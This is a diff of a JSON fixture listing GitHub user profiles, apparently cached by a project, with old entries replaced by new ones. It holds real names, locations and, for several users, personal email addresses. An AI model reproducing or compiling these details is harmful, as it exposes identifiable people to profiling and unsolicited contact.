+ "followers_count": 12, + "public_gists_count": 22, + "public_repositories_count": 25, + "created_at": "2014-03-04T05:47:41Z", + "updated_at": "2022-11-27T23:26:30Z", + "node_id": "MDQ6VXNlcjY4NDczNTA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3084, + "pk": 8472, "fields": { - "nest_created_at": "2024-09-12T03:13:48.813Z", - "nest_updated_at": "2024-09-12T03:13:48.813Z", - "name": "Rewinter", - "login": "rew1nter", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64508791?v=4", + "nest_created_at": "2024-09-22T10:40:52.422Z", + "nest_updated_at": "2024-09-22T20:26:03.830Z", + "name": "Michael Kohl", + "login": "citizen428", + "email": "me@citizen428.net", + "avatar_url": "https://avatars.githubusercontent.com/u/47985?v=4", "company": "", - "location": "", + "location": "Thailand", "collaborators_count": 0, - "following_count": 19, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2020-04-29T01:01:09Z", - "updated_at": "2024-08-28T09:50:44Z", - "node_id": "MDQ6VXNlcjY0NTA4Nzkx", - "bio": "No alarms and no surprises please.", - "is_hireable": false, + "following_count": 66, + "followers_count": 244, + "public_gists_count": 48, + "public_repositories_count": 124, + "created_at": "2009-01-20T16:33:09Z", + "updated_at": "2024-09-10T19:53:06Z", + "node_id": "MDQ6VXNlcjQ3OTg1", + "bio": "🇦🇹🇹🇭", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3085, + "pk": 8473, "fields": { - "nest_created_at": "2024-09-12T03:13:49.693Z", - "nest_updated_at": "2024-09-12T03:13:49.693Z", - "name": "Ravi singh", - "login": "itsrvsingh", + "nest_created_at": "2024-09-22T10:40:55.085Z", + "nest_updated_at": "2024-09-22T20:26:06.394Z", + "name": "Mark Vlcek", + "login": "MarkVLK", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78691282?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1841311?v=4", + "company": "@Airbnb", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 16, + "created_at": "2012-06-12T07:02:27Z", + "updated_at": "2024-07-30T05:29:51Z", + "node_id": "MDQ6VXNlcjE4NDEzMTE=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8474, + "fields": { + "nest_created_at": "2024-09-22T10:40:55.422Z", + "nest_updated_at": "2024-09-22T20:26:06.735Z", + "name": "Michael Fitzpatrick", + "login": "mikefitz888", + "email": "mikefitz888@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10033973?v=4", "company": "", - "location": "India", + "location": "United Kingdom, Bristol", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-02-07T14:23:36Z", - "updated_at": "2024-07-17T14:29:36Z", - "node_id": "MDQ6VXNlcjc4NjkxMjgy", - "bio": "", + "public_repositories_count": 11, + "created_at": "2014-12-01T17:35:28Z", + "updated_at": "2024-05-07T15:29:07Z", + "node_id": "MDQ6VXNlcjEwMDMzOTcz", + "bio": "Software developer with a particular interest in high performance computing, cyber security and computer graphics.", "is_hireable": false, - "twitter_username": "Itsrvsinghh" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3086, + "pk": 8475, "fields": { - "nest_created_at": "2024-09-12T03:13:50.506Z", - "nest_updated_at": "2024-09-12T03:13:50.506Z", - "name": "Douglas Carneiro", - "login": "Douglas-Carneiro", - "email": "douglasdscplay@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29848596?v=4", - "company": "Fundação Escola Politécnica da Bahia", - "location": "Salvador, Bahia, Brazil", + "nest_created_at": "2024-09-22T10:40:55.839Z", + "nest_updated_at": "2024-09-22T20:26:07.049Z", + "name": "Nisheal John", + "login": "NishealJ", + "email": "nisheal.work@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/41017303?v=4", + "company": "@cdli-gh @sellergeni", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 19, - "followers_count": 9, + "following_count": 25, + "followers_count": 30, "public_gists_count": 0, - "public_repositories_count": 56, - "created_at": "2017-07-03T02:03:07Z", - "updated_at": "2024-07-27T14:07:13Z", - "node_id": "MDQ6VXNlcjI5ODQ4NTk2", - "bio": "Software Engineer", + "public_repositories_count": 46, + "created_at": "2018-07-09T15:54:40Z", + "updated_at": "2024-09-14T12:42:40Z", + "node_id": "MDQ6VXNlcjQxMDE3MzAz", + "bio": "Software Development & Security Research Enthusiast | Google Summer of Code 2019 & 2020 Student | Mentor", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3087, + "pk": 8476, "fields": { - "nest_created_at": "2024-09-12T03:13:51.345Z", - "nest_updated_at": "2024-09-12T03:13:51.345Z", - "name": "Rohit Kumar", - "login": "rohitcoderCdefense", + "nest_created_at": "2024-09-22T10:40:57.132Z", + "nest_updated_at": "2024-09-22T20:26:08.327Z", + "name": "Tim Gates", + "login": "timgates42", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104613917?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47873678?v=4", + "company": "IRESS", + "location": "Sydney", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 15, + "followers_count": 175, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2022-04-29T05:39:20Z", - "updated_at": "2023-06-18T19:12:34Z", - "node_id": "U_kgDOBjxIHQ", + "public_repositories_count": 1743, + "created_at": "2019-02-22T00:36:27Z", + "updated_at": "2024-08-28T12:38:23Z", + "node_id": "MDQ6VXNlcjQ3ODczNjc4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437428,74 +697827,74 @@ }, { "model": "github.user", - "pk": 3088, + "pk": 8477, "fields": { - "nest_created_at": "2024-09-12T03:13:53Z", - "nest_updated_at": "2024-09-12T03:13:53Z", - "name": "", - "login": "Vanav", + "nest_created_at": "2024-09-22T10:40:57.451Z", + "nest_updated_at": "2024-09-22T20:26:08.660Z", + "name": "Yash Srivastava", + "login": "darkshredder", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/761333?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/52625656?v=4", "company": "", - "location": "", + "location": "IIT Roorkee", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 11, + "followers_count": 32, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2011-05-01T01:05:23Z", - "updated_at": "2024-08-11T11:19:45Z", - "node_id": "MDQ6VXNlcjc2MTMzMw==", - "bio": "", - "is_hireable": true, + "public_repositories_count": 48, + "created_at": "2019-07-07T11:49:18Z", + "updated_at": "2024-09-17T07:10:59Z", + "node_id": "MDQ6VXNlcjUyNjI1NjU2", + "bio": "GSoC'21 @OpenStreetMap | Undergrad at IIT Roorkee | Open Source enthusiast.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3089, + "pk": 8478, "fields": { - "nest_created_at": "2024-09-12T03:13:53.827Z", - "nest_updated_at": "2024-09-12T03:13:55.449Z", - "name": "Özgür Koca", - "login": "enseitankado", - "email": "ozgurkoca@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1208809?v=4", - "company": "izlencebilisim.com", - "location": "Turkey", + "nest_created_at": "2024-09-22T10:40:57.802Z", + "nest_updated_at": "2024-09-22T20:26:08.971Z", + "name": "", + "login": "mrchainman", + "email": "mr.chainman@0box.eu", + "avatar_url": "https://avatars.githubusercontent.com/u/59087991?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 34, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2011-11-20T20:02:13Z", - "updated_at": "2024-08-15T22:42:47Z", - "node_id": "MDQ6VXNlcjEyMDg4MDk=", - "bio": "mount /dev/brain || tail -f /var/log/thoughts >> /pub/www", + "public_repositories_count": 46, + "created_at": "2019-12-20T12:06:14Z", + "updated_at": "2024-07-25T09:58:31Z", + "node_id": "MDQ6VXNlcjU5MDg3OTkx", + "bio": "Profile Picture: @sylvia_ritter@mastodon.social", "is_hireable": false, - "twitter_username": "OzgurKoca2" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3090, + "pk": 8479, "fields": { - "nest_created_at": "2024-09-12T03:13:54.645Z", - "nest_updated_at": "2024-09-12T03:13:54.645Z", - "name": "kento", - "login": "Kento-Sec", + "nest_created_at": "2024-09-22T10:40:58.114Z", + "nest_updated_at": "2024-09-22T20:26:09.282Z", + "name": "", + "login": "pranavsaxena17", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53268974?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/58285865?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 49, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2019-07-24T15:11:23Z", - "updated_at": "2024-07-16T07:45:06Z", - "node_id": "MDQ6VXNlcjUzMjY4OTc0", + "public_repositories_count": 11, + "created_at": "2019-11-28T06:39:49Z", + "updated_at": "2024-03-11T14:08:59Z", + "node_id": "MDQ6VXNlcjU4Mjg1ODY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437503,49 +697902,49 @@ }, { "model": "github.user", - "pk": 3091, + "pk": 8480, "fields": { - "nest_created_at": "2024-09-12T03:13:56.272Z", - "nest_updated_at": "2024-09-12T03:13:56.272Z", - "name": "Mike Loss", - "login": "l0ss", + "nest_created_at": "2024-09-22T10:40:58.431Z", + "nest_updated_at": "2024-09-22T20:26:09.595Z", + "name": "Roger Trevisan", + "login": "r8tor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24580473?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28960180?v=4", "company": "", - "location": "", + "location": "Vancouver, Canada", "collaborators_count": 0, - "following_count": 4, - "followers_count": 192, - "public_gists_count": 1, - "public_repositories_count": 22, - "created_at": "2016-12-15T03:49:26Z", - "updated_at": "2024-09-06T11:38:35Z", - "node_id": "MDQ6VXNlcjI0NTgwNDcz", - "bio": "", + "following_count": 14, + "followers_count": 4, + "public_gists_count": 3, + "public_repositories_count": 44, + "created_at": "2017-05-25T17:30:00Z", + "updated_at": "2024-07-29T19:05:28Z", + "node_id": "MDQ6VXNlcjI4OTYwMTgw", + "bio": "Application Security Specialist", "is_hireable": false, - "twitter_username": "mikeloss" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3092, + "pk": 8481, "fields": { - "nest_created_at": "2024-09-12T03:13:57.101Z", - "nest_updated_at": "2024-09-12T03:15:07.658Z", + "nest_created_at": "2024-09-22T10:40:58.742Z", + "nest_updated_at": "2024-09-22T20:26:09.941Z", "name": "", - "login": "Bugspiderlee", + "login": "mdnggit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65190945?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/112753706?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2020-05-11T19:09:54Z", - "updated_at": "2024-07-15T20:31:59Z", - "node_id": "MDQ6VXNlcjY1MTkwOTQ1", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2022-09-03T09:14:27Z", + "updated_at": "2022-09-03T09:14:27Z", + "node_id": "U_kgDOBrh8Kg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437553,24 +697952,24 @@ }, { "model": "github.user", - "pk": 3093, + "pk": 8482, "fields": { - "nest_created_at": "2024-09-12T03:13:57.926Z", - "nest_updated_at": "2024-09-12T03:13:57.926Z", - "name": "", - "login": "mrbiggleswirth", + "nest_created_at": "2024-09-22T10:40:59.055Z", + "nest_updated_at": "2024-09-22T20:26:10.272Z", + "name": "Nicola", + "login": "nicolabressan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32403340?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11886034?v=4", "company": "", - "location": "", + "location": "Italy", "collaborators_count": 0, - "following_count": 34, + "following_count": 0, "followers_count": 2, - "public_gists_count": 5, - "public_repositories_count": 3, - "created_at": "2017-09-29T22:36:11Z", - "updated_at": "2024-08-18T08:17:54Z", - "node_id": "MDQ6VXNlcjMyNDAzMzQw", + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-04-10T11:20:50Z", + "updated_at": "2020-07-29T08:21:02Z", + "node_id": "MDQ6VXNlcjExODg2MDM0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437578,24 +697977,49 @@ }, { "model": "github.user", - "pk": 3094, + "pk": 8483, "fields": { - "nest_created_at": "2024-09-12T03:13:58.738Z", - "nest_updated_at": "2024-09-12T03:13:58.738Z", + "nest_created_at": "2024-09-22T10:40:59.711Z", + "nest_updated_at": "2024-09-22T20:26:10.900Z", + "name": "John Herrlin", + "login": "jherrlin", + "email": "jherrlin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1143091?v=4", + "company": "", + "location": "Växjö, Sweden", + "collaborators_count": 0, + "following_count": 106, + "followers_count": 59, + "public_gists_count": 18, + "public_repositories_count": 40, + "created_at": "2011-10-21T12:37:46Z", + "updated_at": "2024-08-26T08:58:38Z", + "node_id": "MDQ6VXNlcjExNDMwOTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "jherrlin" + } +}, +{ + "model": "github.user", + "pk": 8484, + "fields": { + "nest_created_at": "2024-09-22T10:41:00.022Z", + "nest_updated_at": "2024-09-22T20:26:11.210Z", "name": "", - "login": "bountyflow", + "login": "r3naissance", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40243783?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15810963?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 15, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-06-13T16:32:23Z", - "updated_at": "2023-08-08T09:58:21Z", - "node_id": "MDQ6VXNlcjQwMjQzNzgz", + "public_repositories_count": 20, + "created_at": "2015-11-12T04:52:42Z", + "updated_at": "2024-08-15T02:51:16Z", + "node_id": "MDQ6VXNlcjE1ODEwOTYz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437603,49 +698027,74 @@ }, { "model": "github.user", - "pk": 3095, + "pk": 8485, "fields": { - "nest_created_at": "2024-09-12T03:13:59.582Z", - "nest_updated_at": "2024-09-12T03:13:59.582Z", - "name": "PJM", - "login": "parkjunmin", - "email": "swm5048@naver.com", - "avatar_url": "https://avatars.githubusercontent.com/u/15859838?v=4", + "nest_created_at": "2024-09-22T10:41:00.649Z", + "nest_updated_at": "2024-09-22T20:26:11.876Z", + "name": "Arun Sori", + "login": "arunk-s", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3816340?v=4", + "company": "Gitlab", + "location": "Amsterdam, NL", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 53, + "public_gists_count": 12, + "public_repositories_count": 41, + "created_at": "2013-03-09T10:25:44Z", + "updated_at": "2024-04-17T17:20:04Z", + "node_id": "MDQ6VXNlcjM4MTYzNDA=", + "bio": "Senior Backend Engineer @gitlabhq", + "is_hireable": true, + "twitter_username": "arunsori" + } +}, +{ + "model": "github.user", + "pk": 8486, + "fields": { + "nest_created_at": "2024-09-22T10:41:06.696Z", + "nest_updated_at": "2024-09-22T20:26:18.211Z", + "name": "Xavi Torelló", + "login": "XaviTorello", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8709244?v=4", "company": "", - "location": "Korea, Seoul", + "location": "Andorra", "collaborators_count": 0, - "following_count": 7, - "followers_count": 12, - "public_gists_count": 0, - "public_repositories_count": 232, - "created_at": "2015-11-15T17:56:11Z", - "updated_at": "2024-03-21T10:55:12Z", - "node_id": "MDQ6VXNlcjE1ODU5ODM4", - "bio": "Security Holic", - "is_hireable": false, + "following_count": 86, + "followers_count": 79, + "public_gists_count": 23, + "public_repositories_count": 84, + "created_at": "2014-09-09T12:20:29Z", + "updated_at": "2024-08-05T14:18:53Z", + "node_id": "MDQ6VXNlcjg3MDkyNDQ=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3096, + "pk": 8487, "fields": { - "nest_created_at": "2024-09-12T03:14:00.396Z", - "nest_updated_at": "2024-09-12T03:14:00.396Z", - "name": "", - "login": "welljacksong", + "nest_created_at": "2024-09-22T10:41:36.535Z", + "nest_updated_at": "2024-09-22T20:26:48.249Z", + "name": "Michael Schwartz", + "login": "msgschwartz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84441037?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33828664?v=4", "company": "", - "location": "", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2021-05-19T08:05:55Z", - "updated_at": "2023-06-12T06:16:06Z", - "node_id": "MDQ6VXNlcjg0NDQxMDM3", + "created_at": "2017-11-20T09:49:39Z", + "updated_at": "2020-11-30T21:35:02Z", + "node_id": "MDQ6VXNlcjMzODI4NjY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437653,24 +698102,24 @@ }, { "model": "github.user", - "pk": 3097, + "pk": 8488, "fields": { - "nest_created_at": "2024-09-12T03:14:01.234Z", - "nest_updated_at": "2024-09-12T03:14:01.234Z", - "name": "DuoKebei", - "login": "duokebei", + "nest_created_at": "2024-09-22T10:41:36.856Z", + "nest_updated_at": "2024-09-22T20:26:48.575Z", + "name": "Katharina Treptow", + "login": "ktreptow", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75022552?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/37484788?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 4, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-11-25T12:09:31Z", - "updated_at": "2024-09-11T02:59:27Z", - "node_id": "MDQ6VXNlcjc1MDIyNTUy", + "public_repositories_count": 9, + "created_at": "2018-03-17T19:19:09Z", + "updated_at": "2024-07-06T14:59:55Z", + "node_id": "MDQ6VXNlcjM3NDg0Nzg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437678,99 +698127,124 @@ }, { "model": "github.user", - "pk": 3098, + "pk": 8489, "fields": { - "nest_created_at": "2024-09-12T03:14:02.099Z", - "nest_updated_at": "2024-09-12T03:14:16.727Z", - "name": "GojoSatoru", - "login": "breaking153", + "nest_created_at": "2024-09-22T10:41:37.183Z", + "nest_updated_at": "2024-09-22T20:26:48.912Z", + "name": "Arnd Issler", + "login": "arndissler", + "email": "email@arndissler.net", + "avatar_url": "https://avatars.githubusercontent.com/u/1671964?v=4", + "company": "", + "location": "Hamburg, DE", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 27, + "public_gists_count": 6, + "public_repositories_count": 31, + "created_at": "2012-04-23T19:00:13Z", + "updated_at": "2024-09-13T08:34:42Z", + "node_id": "MDQ6VXNlcjE2NzE5NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "arndissler" + } +}, +{ + "model": "github.user", + "pk": 8490, + "fields": { + "nest_created_at": "2024-09-22T10:41:37.503Z", + "nest_updated_at": "2024-09-22T20:26:49.271Z", + "name": "Pedro Laguna", + "login": "plaguna", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49428332?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1691868?v=4", "company": "", - "location": "", + "location": "Sevilla. Spain", "collaborators_count": 0, - "following_count": 22, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2019-04-09T06:09:06Z", - "updated_at": "2024-09-01T11:12:24Z", - "node_id": "MDQ6VXNlcjQ5NDI4MzMy", - "bio": "As a passionate coding enthusiast, I, Man Steve, excel in Python, Java, and C++. I eagerly participate in competitions and aspire to make an impact in the tech ", + "following_count": 3, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 3, + "created_at": "2012-04-30T08:43:52Z", + "updated_at": "2024-09-09T08:54:48Z", + "node_id": "MDQ6VXNlcjE2OTE4Njg=", + "bio": "geek.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3099, + "pk": 8491, "fields": { - "nest_created_at": "2024-09-12T03:14:02.923Z", - "nest_updated_at": "2024-09-12T03:14:02.923Z", - "name": "Joshua MARTINELLE", - "login": "JoshuaMart", - "email": "contact@jomar.fr", - "avatar_url": "https://avatars.githubusercontent.com/u/17493961?v=4", - "company": "Senior Research Engineer - Tenable", - "location": "France", + "nest_created_at": "2024-09-22T10:42:31.714Z", + "nest_updated_at": "2024-09-22T20:27:43.040Z", + "name": "Chris Schmidt", + "login": "chrisisbeef", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/622346?v=4", + "company": "FluidTruck", + "location": "Denver, Co", "collaborators_count": 0, - "following_count": 2, - "followers_count": 86, - "public_gists_count": 1, - "public_repositories_count": 13, - "created_at": "2016-02-26T11:12:07Z", - "updated_at": "2024-06-25T19:34:51Z", - "node_id": "MDQ6VXNlcjE3NDkzOTYx", + "following_count": 15, + "followers_count": 43, + "public_gists_count": 8, + "public_repositories_count": 21, + "created_at": "2011-02-17T00:53:27Z", + "updated_at": "2024-08-15T18:40:50Z", + "node_id": "MDQ6VXNlcjYyMjM0Ng==", "bio": "", "is_hireable": false, - "twitter_username": "J0_mart" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3100, + "pk": 8492, "fields": { - "nest_created_at": "2024-09-12T03:14:05.483Z", - "nest_updated_at": "2024-09-12T03:14:05.483Z", - "name": "Bellatrix Lugosi", - "login": "Cvar1984", - "email": "cvar1984@cvar1984.my.id", - "avatar_url": "https://avatars.githubusercontent.com/u/32727560?v=4", - "company": "@BlackHoleSecurity ", - "location": "Wired", + "nest_created_at": "2024-09-22T10:42:32.338Z", + "nest_updated_at": "2024-09-22T20:27:43.667Z", + "name": "Wiiitek", + "login": "wiiitek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5294646?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 65, - "followers_count": 333, - "public_gists_count": 57, - "public_repositories_count": 74, - "created_at": "2017-10-12T05:06:47Z", - "updated_at": "2024-08-31T04:56:00Z", - "node_id": "MDQ6VXNlcjMyNzI3NTYw", - "bio": "The quiet white owl fly over quick brown fox that jumps over the lazy dog ", - "is_hireable": true, + "following_count": 10, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2013-08-23T12:32:53Z", + "updated_at": "2024-08-28T20:20:14Z", + "node_id": "MDQ6VXNlcjUyOTQ2NDY=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3101, + "pk": 8493, "fields": { - "nest_created_at": "2024-09-12T03:14:06.335Z", - "nest_updated_at": "2024-09-12T03:14:06.335Z", + "nest_created_at": "2024-09-22T10:42:32.657Z", + "nest_updated_at": "2024-09-22T20:27:44.002Z", "name": "", - "login": "iso1983", + "login": "karansanwal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40856827?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/97483117?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2018-07-05T10:21:40Z", - "updated_at": "2024-04-17T23:07:47Z", - "node_id": "MDQ6VXNlcjQwODU2ODI3", + "public_repositories_count": 0, + "created_at": "2022-01-10T22:43:00Z", + "updated_at": "2022-01-10T22:43:00Z", + "node_id": "U_kgDOBc95bQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437778,74 +698252,74 @@ }, { "model": "github.user", - "pk": 3102, + "pk": 8494, "fields": { - "nest_created_at": "2024-09-12T03:14:07.161Z", - "nest_updated_at": "2024-09-12T03:14:07.161Z", - "name": "Aleksander Mazurov", - "login": "remotejob", + "nest_created_at": "2024-09-22T10:42:33.333Z", + "nest_updated_at": "2024-09-22T20:27:44.685Z", + "name": "Anthony Musyoki", + "login": "anthonyms", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11746195?v=4", - "company": "remotejob", - "location": "Finland", + "avatar_url": "https://avatars.githubusercontent.com/u/445103?v=4", + "company": "", + "location": "Nairobi", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 26, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 111, - "created_at": "2015-04-01T01:03:47Z", - "updated_at": "2024-08-10T19:40:33Z", - "node_id": "MDQ6VXNlcjExNzQ2MTk1", + "public_repositories_count": 33, + "created_at": "2010-10-19T08:06:32Z", + "updated_at": "2024-08-30T17:05:11Z", + "node_id": "MDQ6VXNlcjQ0NTEwMw==", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3103, + "pk": 8495, "fields": { - "nest_created_at": "2024-09-12T03:14:08.007Z", - "nest_updated_at": "2024-09-12T03:14:08.007Z", - "name": "Rutger van Waveren", - "login": "rvw", + "nest_created_at": "2024-09-22T10:42:33.658Z", + "nest_updated_at": "2024-09-22T20:27:44.995Z", + "name": "", + "login": "JoelRabinovitch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/903647?v=4", - "company": "Hadrian", - "location": "Amsterdam", + "avatar_url": "https://avatars.githubusercontent.com/u/28541343?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 2, - "created_at": "2011-07-08T20:03:31Z", - "updated_at": "2024-08-12T09:11:12Z", - "node_id": "MDQ6VXNlcjkwMzY0Nw==", - "bio": "Product @ Hadrian", + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-05-08T17:43:58Z", + "updated_at": "2024-06-01T23:41:45Z", + "node_id": "MDQ6VXNlcjI4NTQxMzQz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3104, + "pk": 8496, "fields": { - "nest_created_at": "2024-09-12T03:14:08.818Z", - "nest_updated_at": "2024-09-12T03:14:08.818Z", - "name": "", - "login": "ryoma30", + "nest_created_at": "2024-09-22T10:42:33.977Z", + "nest_updated_at": "2024-09-22T20:27:45.319Z", + "name": "Steve Bosman", + "login": "stevebosman-oc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33037603?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/104826360?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-10-23T18:20:45Z", - "updated_at": "2024-07-24T05:18:16Z", - "node_id": "MDQ6VXNlcjMzMDM3NjAz", + "public_repositories_count": 9, + "created_at": "2022-05-03T08:41:59Z", + "updated_at": "2023-12-13T21:29:37Z", + "node_id": "U_kgDOBj-F-A", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437853,74 +698327,74 @@ }, { "model": "github.user", - "pk": 3105, + "pk": 8497, "fields": { - "nest_created_at": "2024-09-12T03:14:09.677Z", - "nest_updated_at": "2024-09-12T03:14:09.677Z", - "name": "@gdattacker", - "login": "GDATTACKER-RESEARCHER", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37478652?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:42:34.300Z", + "nest_updated_at": "2024-09-22T20:27:45.629Z", + "name": "David Myers", + "login": "davidmyersdev", + "email": "hello@davidmyers.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/922012?v=4", + "company": "@Doximity", + "location": "Columbus, Ohio", "collaborators_count": 0, - "following_count": 40, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2018-03-17T14:49:39Z", - "updated_at": "2024-08-30T13:20:59Z", - "node_id": "MDQ6VXNlcjM3NDc4NjUy", - "bio": "", + "following_count": 168, + "followers_count": 191, + "public_gists_count": 21, + "public_repositories_count": 65, + "created_at": "2011-07-18T04:10:35Z", + "updated_at": "2024-07-29T17:53:47Z", + "node_id": "MDQ6VXNlcjkyMjAxMg==", + "bio": "Hello! My name is David, and I build tools to help you be more productive. If you find my work useful, I would really appreciate a sponsorship or donation. 🪴", "is_hireable": false, - "twitter_username": "gdattacker" + "twitter_username": "davidmyersdev" } }, { "model": "github.user", - "pk": 3106, + "pk": 8498, "fields": { - "nest_created_at": "2024-09-12T03:14:10.501Z", - "nest_updated_at": "2024-09-12T03:14:10.501Z", - "name": "Vincent Cox", - "login": "vincentcox", + "nest_created_at": "2024-09-22T10:42:34.609Z", + "nest_updated_at": "2024-09-22T20:27:45.941Z", + "name": "Simon McClenahan", + "login": "simon0117", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9286611?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5805263?v=4", "company": "", - "location": "Belgium", + "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 191, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2014-10-17T17:53:52Z", - "updated_at": "2024-08-21T11:24:53Z", - "node_id": "MDQ6VXNlcjkyODY2MTE=", - "bio": "I have a hate-love relationship with coding", + "following_count": 6, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2013-10-29T15:38:13Z", + "updated_at": 